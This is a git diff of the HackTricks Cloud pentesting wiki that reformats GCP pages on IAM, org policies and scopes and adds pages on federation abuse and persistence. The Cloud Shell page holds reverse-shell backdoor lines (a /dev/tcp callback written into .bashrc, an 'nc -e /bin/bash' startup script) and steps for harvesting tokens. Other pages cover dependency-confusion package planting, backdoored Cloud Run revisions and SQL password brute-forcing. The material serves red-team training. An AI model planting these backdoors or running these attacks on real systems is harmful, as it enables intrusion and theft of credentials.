https://cloud.google.com/resource-manager/img/org-policy-concepts.svg

 
 #### Common use cases 
 
-* Limit resource sharing based on domain.
-* Limit the usage of Identity and Access Management service accounts.
-* Restrict the physical location of newly created resources.
-* Disable service account creation
+- Limit resource sharing based on domain.
+- Limit the usage of Identity and Access Management service accounts.
+- Restrict the physical location of newly created resources.
+- Disable service account creation
 
-

+

 
 There are many more constraints that give you fine-grained control of your organization's resources. For **more information, see the** [**list of all Organization Policy Service constraints**](https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints)**.**
 
@@ -69,39 +56,39 @@ There are many more constraints that give you fine-grained control of your organ
 
 **Access Management Policies**
 
-* **Domain restricted contacts:** Prevents adding users to Essential Contacts outside your specified domains. This limits Essential Contacts to only allow managed user identities in your selected domains to receive platform notifications.
-* **Domain restricted sharing:** Prevents adding users to IAM policies outside your specified domains. This limits IAM policies to only allow managed user identities in your selected domains to access resources inside this organization.
-* **Public access prevention:** Prevents Cloud Storage buckets from being exposed to the public. This ensures that a developer can't configure Cloud Storage buckets to have unauthenticated internet access.
-* **Uniform bucket level access:** Prevents object-level access control lists (ACLs) in Cloud Storage buckets. This simplifies your access management by applying IAM policies consistently across all objects in Cloud Storage buckets.
-* **Require OS login:** VMs created in new projects will have OS Login enabled. This lets you manage SSH access to your instances using IAM without needing to create and manage individual SSH keys.
+- **Domain restricted contacts:** Prevents adding users to Essential Contacts outside your specified domains. This limits Essential Contacts to only allow managed user identities in your selected domains to receive platform notifications.
+- **Domain restricted sharing:** Prevents adding users to IAM policies outside your specified domains. This limits IAM policies to only allow managed user identities in your selected domains to access resources inside this organization.
+- **Public access prevention:** Prevents Cloud Storage buckets from being exposed to the public. This ensures that a developer can't configure Cloud Storage buckets to have unauthenticated internet access.
+- **Uniform bucket level access:** Prevents object-level access control lists (ACLs) in Cloud Storage buckets. This simplifies your access management by applying IAM policies consistently across all objects in Cloud Storage buckets.
+- **Require OS login:** VMs created in new projects will have OS Login enabled. This lets you manage SSH access to your instances using IAM without needing to create and manage individual SSH keys.
 
 **Additional security policies for service accounts**
 
-* **Disable automatic IAM grants**: Prevents the default App Engine and Compute Engine service accounts from automatically being granted the Editor IAM role on a project at creation. This ensures service accounts don't receive overly-permissive IAM roles upon creation.
-* **Disable service account key creation**: Prevents the creation of public service account keys. This helps reduce the risk of exposing persistent credentials.
-* **Disable service account key upload**: Prevents the uploading of public service account keys. This helps reduce the risk of leaked or reused key material.
+- **Disable automatic IAM grants**: Prevents the default App Engine and Compute Engine service accounts from automatically being granted the Editor IAM role on a project at creation. This ensures service accounts don't receive overly-permissive IAM roles upon creation.
+- **Disable service account key creation**: Prevents the creation of public service account keys. This helps reduce the risk of exposing persistent credentials.
+- **Disable service account key upload**: Prevents the uploading of public service account keys. This helps reduce the risk of leaked or reused key material.
 
 **Secure VPC network configuration policies**
 
-* **Define allowed external IPs for VM instances**: Prevents the creation of Compute instances with a public IP, which can expose them to internet traffic.
+- **Define allowed external IPs for VM instances**: Prevents the creation of Compute instances with a public IP, which can expose them to internet traffic.
 
-- **Disable VM nested virtualization**: Prevents the creation of nested VMs on Compute Engine VMs. This decreases the security risk of having unmonitored nested VMs.
+* **Disable VM nested virtualization**: Prevents the creation of nested VMs on Compute Engine VMs. This decreases the security risk of having unmonitored nested VMs.
 
-* **Disable VM serial port:** Prevents serial port access to Compute Engine VMs. This prevents input to a server’s serial port using the Compute Engine API.
+- **Disable VM serial port:** Prevents serial port access to Compute Engine VMs. This prevents input to a server’s serial port using the Compute Engine API.
 
-- **Restrict authorized networks on Cloud SQL instances:** Prevents public or non-internal network ranges from accessing your Cloud SQL databases.
+* **Restrict authorized networks on Cloud SQL instances:** Prevents public or non-internal network ranges from accessing your Cloud SQL databases.
 
-* **Restrict Protocol Forwarding Based on type of IP Address:** Prevents VM protocol forwarding for external IP addresses.
+- **Restrict Protocol Forwarding Based on type of IP Address:** Prevents VM protocol forwarding for external IP addresses.
 
-- **Restrict Public IP access on Cloud SQL instances:** Prevents the creation of Cloud SQL instances with a public IP, which can expose them to internet traffic.
+* **Restrict Public IP access on Cloud SQL instances:** Prevents the creation of Cloud SQL instances with a public IP, which can expose them to internet traffic.
 
-* **Restrict shared VPC project lien removal:** Prevents the accidental deletion of Shared VPC host projects.
+- **Restrict shared VPC project lien removal:** Prevents the accidental deletion of Shared VPC host projects.
 
-- **Sets the internal DNS setting for new projects to Zonal DNS Only:** Prevents the use of a legacy DNS setting that has reduced service availability.
+* **Sets the internal DNS setting for new projects to Zonal DNS Only:** Prevents the use of a legacy DNS setting that has reduced service availability.
 
-* **Skip default network creation:** Prevents automatic creation of the default VPC network and related resources. This avoids overly-permissive default firewall rules.
+- **Skip default network creation:** Prevents automatic creation of the default VPC network and related resources. This avoids overly-permissive default firewall rules.
 
-- **Disable VPC External IPv6 usage:** Prevents the creation of external IPv6 subnets, which can be exposed to unauthorized internet access.
+* **Disable VPC External IPv6 usage:** Prevents the creation of external IPv6 subnets, which can be exposed to unauthorized internet access.
 
 
 
@@ -114,9 +101,9 @@ This could be a problem because this means that the only way to find out **which
 
 There are **three types** of roles in IAM:
 
-* **Basic/Primitive roles**, which include the **Owner**, **Editor**, and **Viewer** roles that existed prior to the introduction of IAM.
-* **Predefined roles**, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you can **see all of them with the privileges they have** [**here**](https://cloud.google.com/iam/docs/understanding-roles#predefined_roles).
-* **Custom roles**, which provide granular access according to a user-specified list of permissions.
+- **Basic/Primitive roles**, which include the **Owner**, **Editor**, and **Viewer** roles that existed prior to the introduction of IAM.
+- **Predefined roles**, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you can **see all of them with the privileges they have** [**here**](https://cloud.google.com/iam/docs/understanding-roles#predefined_roles).
+- **Custom roles**, which provide granular access according to a user-specified list of permissions.
 
 There are thousands of permissions in GCP. In order to check if a role has a permissions you can [**search the permission here**](https://cloud.google.com/iam/docs/permissions-reference) and see which roles have it.
 
@@ -125,9 +112,9 @@ Moreover, note that **permissions** will only **take effect** if they are **atta
 
 Or check if a **custom role can use a** [**specific permission in here**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.**
 
-{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %}
-[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-iam-and-org-policies-enum.md
+{{#endref}}
 
 ## Users 
 
@@ -145,15 +132,15 @@ When an organisation is created several groups are **strongly suggested to be cr
 
 ## **Default Password Policy**
 
-* Enforce strong passwords
-* Between 8 and 100 characters
-* No reuse
-* No expiration
-* If people is accessing Workspace through a third party provider, these requirements aren't applied.
+- Enforce strong passwords
+- Between 8 and 100 characters
+- No reuse
+- No expiration
+- If people is accessing Workspace through a third party provider, these requirements aren't applied.
 
-

+

 
-

+

 
 ## **Service accounts**
 
@@ -179,9 +166,9 @@ SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com
 
 There are 2 main ways to access GCP as a service account:
 
-* **Via OAuth tokens**: These are tokens that you will get from places like metadata endpoints or stealing http requests and they are limited by the **access scopes**.
-* **Keys**: These are public and private key pairs that will allow you to sign requests as the service account and even generate OAuth tokens to perform actions as the service account. These keys are dangerous because they are more complicated to limit and control, that's why GCP recommend to not generate them.
-  * Note that every-time a SA is created, **GCP generates a key for the service account** that the user cannot access (and won't be listed in the web application). According to [**this thread**](https://www.reddit.com/r/googlecloud/comments/f0ospy/service_account_keys_observations/) this key is **used internally by GCP** to give metadata endpoints access to generate the accesible OAuth tokens.
+- **Via OAuth tokens**: These are tokens that you will get from places like metadata endpoints or stealing http requests and they are limited by the **access scopes**.
+- **Keys**: These are public and private key pairs that will allow you to sign requests as the service account and even generate OAuth tokens to perform actions as the service account. These keys are dangerous because they are more complicated to limit and control, that's why GCP recommend to not generate them.
+  - Note that every-time a SA is created, **GCP generates a key for the service account** that the user cannot access (and won't be listed in the web application). According to [**this thread**](https://www.reddit.com/r/googlecloud/comments/f0ospy/service_account_keys_observations/) this key is **used internally by GCP** to give metadata endpoints access to generate the accesible OAuth tokens.
 
 ### **Access scopes**
 
@@ -192,7 +179,6 @@ Google actually [recommends](https://cloud.google.com/compute/docs/access/servic
 
 You can see what **scopes** are **assigned** by **querying:**
 
-{% code overflow="wrap" %}
 ```bash
 curl 'https://www.googleapis.com/oauth2/v1/tokeninfo?access_token='
 
@@ -207,7 +193,6 @@ curl 'https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=
   "access_type": "offline"
 }
 ```
-{% endcode %}
 
 The previous **scopes** are the ones generated by **default** using **`gcloud`** to access data. This is because when you use **`gcloud`** you first create an OAuth token, and then use it to contact the endpoints.
 
@@ -217,44 +202,29 @@ You can **find a list of** [**all the possible scopes in here**](https://develop
 
 If you have **`gcloud`** browser credentials, it's possible to **obtain a token with other scopes,** doing something like:
 
-{% code overflow="wrap" %}
 ```bash
 # Maybe you can get a user token with other scopes changing the scopes array from ~/.config/gcloud/credentials.db
 
 # Set new scopes for SDKs credentials
 gcloud auth application-default login --scopes=https://www.googleapis.com/auth/userinfo.email,https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/sqlservice.login,https://www.googleapis.com/auth/appengine.admin,https://www.googleapis.com/auth/compute,https://www.googleapis.com/auth/accounts.reauth,https://www.googleapis.com/auth/admin.directory.user,https://www.googleapis.com/auth/admin.directory.group,https://www.googleapis.com/auth/admin.directory.domain,https://www.googleapis.com/auth/admin.directory.user
 
-# Print new token 
+# Print new token
 gcloud auth application-default print-access-token
 
 # To use this token with some API you might need to use curl to indicate the project header with --header "X-Goog-User-Project: "
 ```
-{% endcode %}
 
 ## **Terraform IAM Policies, Bindings and Memberships**
 
-As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam) using terraform with GCP there are different ways to grant a principal access over a resource:
+As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam) using terraform with GCP there are different ways to grant a principal access over a resource:
 
-* **Memberships**: You set **principals as members of roles** **without restrictions** over the role or the principals. You can put a user as a member of a role and then put a group as a member of the same role and also set those principals (user and group) as member of other roles.
-* **Bindings**: Several **principals can be binded to a role**. Those **principals can still be binded or be members of other roles**. However, if a principal which isn’t binded to the role is set as **member of a binded role**, the next time the **binding is applied, the membership will disappear**.
-* **Policies**: A policy is **authoritative**, it indicates roles and principals and then, **those principals cannot have more roles and those roles cannot have more principals** unless that policy is modified (not even in other policies, bindings or memberships). Therefore, when a role or principal is specified in policy all its privileges are **limited by that policy**. Obviously, this can be bypassed in case the principal is given the option to modify the policy or privilege escalation permissions (like create a new principal and bind him a new role).
+- **Memberships**: You set **principals as members of roles** **without restrictions** over the role or the principals. You can put a user as a member of a role and then put a group as a member of the same role and also set those principals (user and group) as member of other roles.
+- **Bindings**: Several **principals can be binded to a role**. Those **principals can still be binded or be members of other roles**. However, if a principal which isn’t binded to the role is set as **member of a binded role**, the next time the **binding is applied, the membership will disappear**.
+- **Policies**: A policy is **authoritative**, it indicates roles and principals and then, **those principals cannot have more roles and those roles cannot have more principals** unless that policy is modified (not even in other policies, bindings or memberships). Therefore, when a role or principal is specified in policy all its privileges are **limited by that policy**. Obviously, this can be bypassed in case the principal is given the option to modify the policy or privilege escalation permissions (like create a new principal and bind him a new role).
 
 ## References
 
-* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
-* [https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy)
+- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md b/src/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
new file mode 100644
index 000000000..55e8d2f71
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
@@ -0,0 +1,153 @@
+# GCP - Federation Abuse
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## OIDC - Github Actions Abuse
+
+### GCP
+
+In order to give **access to the Github Actions** from a Github repo to a GCP **service account** the following steps are needed:
+
+- **Create the Service Account** to access from github actions with the **desired permissions:**
+
+```bash
+projectId=FIXME
+gcloud config set project $projectId
+
+# Create the Service Account
+gcloud iam service-accounts create "github-demo-sa"
+saId="github-demo-sa@${projectId}.iam.gserviceaccount.com"
+
+# Enable the IAM Credentials API
+gcloud services enable iamcredentials.googleapis.com
+
+# Give permissions to SA
+
+gcloud projects add-iam-policy-binding $projectId \
+    --member="serviceAccount:$saId" \
+    --role="roles/iam.securityReviewer"
+```
+
+- Generate a **new workload identity pool**:
+
+```bash
+# Create a Workload Identity Pool
+poolName=wi-pool
+
+gcloud iam workload-identity-pools create $poolName \
+  --location global \
+  --display-name $poolName
+
+poolId=$(gcloud iam workload-identity-pools describe $poolName \
+  --location global \
+  --format='get(name)')
+```
+
+- Generate a new **workload identity pool OIDC provider** that **trusts** github actions (by org/repo name in this scenario):
+
+```bash
+attributeMappingScope=repository # could be sub (GitHub repository and branch) or repository_owner (GitHub organization)
+
+gcloud iam workload-identity-pools providers create-oidc $poolName \
+  --location global \
+  --workload-identity-pool $poolName \
+  --display-name $poolName \
+  --attribute-mapping "google.subject=assertion.${attributeMappingScope},attribute.actor=assertion.actor,attribute.aud=assertion.aud,attribute.repository=assertion.repository" \
+  --issuer-uri "https://token.actions.githubusercontent.com"
+
+providerId=$(gcloud iam workload-identity-pools providers describe $poolName \
+  --location global \
+  --workload-identity-pool $poolName \
+  --format='get(name)')
+```
+
+- Finally, **allow the principal** from the provider to use a service principal:
+
+```bash
+gitHubRepoName="repo-org/repo-name"
+gcloud iam service-accounts add-iam-policy-binding $saId \
+  --role "roles/iam.workloadIdentityUser" \
+  --member "principalSet://iam.googleapis.com/${poolId}/attribute.${attributeMappingScope}/${gitHubRepoName}"
+```
+
+> [!WARNING]
+> Note how in the previous member we are specifying the **`org-name/repo-name`** as conditions to be able to access the service account (other params that makes it **more restrictive** like the branch could also be used).
+>
+> However it's also possible to **allow all github to access** the service account creating a provider such the following using a wildcard:
+
+
# Create a Workload Identity Pool
+poolName=wi-pool2
+
+gcloud iam workload-identity-pools create $poolName \
+  --location global \
+  --display-name $poolName
+
+poolId=$(gcloud iam workload-identity-pools describe $poolName \
+  --location global \
+  --format='get(name)')
+
+gcloud iam workload-identity-pools providers create-oidc $poolName \
+  --project="${projectId}" \
+  --location="global" \
+  --workload-identity-pool="$poolName" \
+  --display-name="Demo provider" \
+  --attribute-mapping="google.subject=assertion.sub,attribute.actor=assertion.actor,attribute.aud=assertion.aud" \
+  --issuer-uri="https://token.actions.githubusercontent.com"
+
+providerId=$(gcloud iam workload-identity-pools providers describe $poolName \
+  --location global \
+  --workload-identity-pool $poolName \
+  --format='get(name)')
+
+# CHECK THE WILDCARD
+gcloud iam service-accounts add-iam-policy-binding "${saId}" \
+  --project="${projectId}" \
+  --role="roles/iam.workloadIdentityUser" \
+  --member="principalSet://iam.googleapis.com/${poolId}/*"
+

+
+> [!WARNING]
+> In this case anyone could access the service account from github actions, so it's important always to **check how the member is defined**.\
+> It should be always something like this:
+>
+> `attribute.{custom_attribute}`:`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
+
+### Github
+
+Remember to change **`${providerId}`** and **`${saId}`** for their respective values:
+
+```yaml
+name: Check GCP action
+on:
+  workflow_dispatch:
+  pull_request:
+    branches:
+      - main
+
+permissions:
+  id-token: write
+
+jobs:
+  Get_OIDC_ID_token:
+    runs-on: ubuntu-latest
+    steps:
+      - id: "auth"
+        name: "Authenticate to GCP"
+        uses: "google-github-actions/auth@v2.1.3"
+        with:
+          create_credentials_file: "true"
+          workload_identity_provider: "${providerId}" # In the providerId, the numerical project ID (12 digit number) should be used
+          service_account: "${saId}" # instead of the alphanumeric project ID. ex:
+          activate_credentials_file: true # projects/123123123123/locations/global/workloadIdentityPools/iam-lab-7-gh-pool/providers/iam-lab-7-gh-pool-oidc-provider'
+      - id: "gcloud"
+        name: "gcloud"
+        run: |-
+          gcloud config set project 
+          gcloud config set account '${saId}'
+          gcloud auth login --brief --cred-file="${{ steps.auth.outputs.credentials_file_path }}"
+          gcloud auth list
+          gcloud projects list
+          gcloud secrets list
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md b/src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md
similarity index 100%
rename from pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md
rename to src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/README.md b/src/pentesting-cloud/gcp-security/gcp-persistence/README.md
similarity index 100%
rename from pentesting-cloud/gcp-security/gcp-persistence/README.md
rename to src/pentesting-cloud/gcp-security/gcp-persistence/README.md
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md
new file mode 100644
index 000000000..76643a4ae
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md
@@ -0,0 +1,21 @@
+# GCP - API Keys Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## API Keys
+
+For more information about API Keys check:
+
+{{#ref}}
+../gcp-services/gcp-api-keys-enum.md
+{{#endref}}
+
+### Create new / Access existing ones
+
+Check how to do this in:
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-apikeys-privesc.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md
new file mode 100644
index 000000000..82bf6fd5e
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md
@@ -0,0 +1,21 @@
+# GCP - App Engine Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## App Engine
+
+For more information about App Engine check:
+
+{{#ref}}
+../gcp-services/gcp-app-engine-enum.md
+{{#endref}}
+
+### Modify code
+
+If yoi could just modify the code of a running version or create a new one yo could make it run your backdoor and mantain persistence.
+
+### Old version persistence
+
+**Every version of the web application is going to be run**, if you find that an App Engine project is running several versions, you could **create a new one** with your **backdoor** code, and then **create a new legit** one so the last one is the legit but there will be a **backdoored one also running**.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
new file mode 100644
index 000000000..e4c4bb258
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
@@ -0,0 +1,42 @@
+# GCP - Artifact Registry Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Artifact Registry
+
+For more information about Artifact Registry check:
+
+{{#ref}}
+../gcp-services/gcp-artifact-registry-enum.md
+{{#endref}}
+
+### Dependency Confusion
+
+- What happens if a **remote and a standard** repositories **are mixed in a virtual** one and a package exists in both?
+  - The one with the **highest priority set in the virtual repository** is used
+  - If the **priority is the same**:
+    - If the **version** is the **same**, the **policy name alphabetically** first in the virtual repository is used
+    - If not, the **highest version** is used
+
+> [!CAUTION]
+> Therefore, it's possible to **abuse a highest version (dependency confusion)** in a public package registry if the remote repository has a higher or same priority
+
+This technique can be useful for **persistence** and **unauthenticated access** as to abuse it it just require to **know a library name** stored in Artifact Registry and **create that same library in the public repository (PyPi for python for example)** with a higher version.
+
+For persistence these are the steps you need to follow:
+
+- **Requirements**: A **virtual repository** must **exist** and be used, an **internal package** with a **name** that doesn't exist in the **public repository** must be used.
+- Create a remote repository if it doesn't exist
+- Add the remote repository to the virtual repository
+- Edit the policies of the virtual registry to give a higher priority (or same) to the remote repository.\
+  Run something like:
+  - [gcloud artifacts repositories update --upstream-policy-file ...](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/update#--upstream-policy-file)
+- Download the legit package, add your malicious code and register it in the public repository with the same version. Every time a developer installs it, he will install yours!
+
+For more information about dependency confusion check:
+
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/dependency-confusion
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md
new file mode 100644
index 000000000..e524fd97e
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md
@@ -0,0 +1,21 @@
+# GCP - BigQuery Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## BigQuery
+
+For more information about BigQuery check:
+
+{{#ref}}
+../gcp-services/gcp-bigquery-enum.md
+{{#endref}}
+
+### Grant further access
+
+Grant further access over datasets, tables, rows and columns to compromised users or external users. Check the privileges needed and how to do this in the page:
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-bigquery-privesc.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md
new file mode 100644
index 000000000..e02c5e3e4
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md
@@ -0,0 +1,19 @@
+# GCP - Cloud Functions Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Functions
+
+For more info about Cloud Functions check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-functions-enum.md
+{{#endref}}
+
+### Persistence Techniques
+
+- **Modify the code** of the Cloud Function, even just the `requirements.txt`
+- **Allow anyone** to call a vulnerable Cloud Function or a backdoor one
+- **Trigger** a Cloud Function when something happens to infect something
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md
new file mode 100644
index 000000000..a59ef33ba
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md
@@ -0,0 +1,25 @@
+# GCP - Cloud Run Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Run
+
+For more information about Cloud Run check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-run-enum.md
+{{#endref}}
+
+### Backdoored Revision
+
+Create a new backdoored revision of a Run Service and split some traffic to it.
+
+### Publicly Accessible Service
+
+Make a Service publicly accessible
+
+### Backdoored Service or Job
+
+Create a backdoored Service or Job
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
new file mode 100644
index 000000000..c38442234
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
@@ -0,0 +1,69 @@
+# GCP - Cloud Shell Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Shell
+
+For more information check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-shell-enum.md
+{{#endref}}
+
+### Persistent Backdoor
+
+[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost.
+
+You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**.
+
+This console has some interesting capabilities for attackers:
+
+1. **Any Google user with access to Google Cloud** has access to a fully authenticated Cloud Shell instance (Service Accounts can, even being Owners of the org).
+2. Said instance will **maintain its home directory for at least 120 days** if no activity happens.
+3. There is **no capabilities for an organisation to monitor** the activity of that instance.
+
+This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing:
+
+```bash
+echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
+```
+
+There is another file in the home folder called **`.customize_environment`** that, if exists, is going to be **executed everytime** the user access the **cloud shell** (like in the previous technique). Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell:
+
+```bash
+#!/bin/sh
+apt-get install netcat -y
+nc  443 -e /bin/bash
+```
+
+> [!WARNING]
+> It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used.
+
+This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session:
+
+

+
+However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**:
+
+```bash
+gcloud auth print-access-token
+gcloud auth application-default print-access-token
+```
+
+#### How the SSH connection is stablished
+
+Basically, these 3 API calls are used:
+
+- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (will make you add your public key you created locally)
+- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (will make you start the instance)
+- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (will tell you the ip of the google cloud shell)
+
+But you can find further information in [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
+
+## References
+
+- [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec)
+- [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
+- [https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md
new file mode 100644
index 000000000..795314341
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md
@@ -0,0 +1,37 @@
+# GCP - Cloud SQL Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud SQL
+
+For more information about Cloud SQL check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-sql-enum.md
+{{#endref}}
+
+### Expose the database and whitelist your IP address
+
+A database only accessible from an internal VPC can be exposed externally and your IP address can be whitelisted so you can access it.\
+For more information check the technique in:
+
+{{#ref}}
+../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
+{{#endref}}
+
+### Create a new user / Update users password / Get password of a user
+
+To connect to a database you **just need access to the port** exposed by the database and a **username** and **password**. With e**nough privileges** you could **create a new user** or **update** an existing user **password**.\
+Another option would be to **brute force the password of an user** by trying several password or by accessing the **hashed** password of the user inside the database (if possible) and cracking it.\
+Remember that **it's possible to list the users of a database** using GCP API.
+
+> [!NOTE]
+> You can create/update users using GCP API or from inside the databae if you have enough permissions.
+
+For more information check the technique in:
+
+{{#ref}}
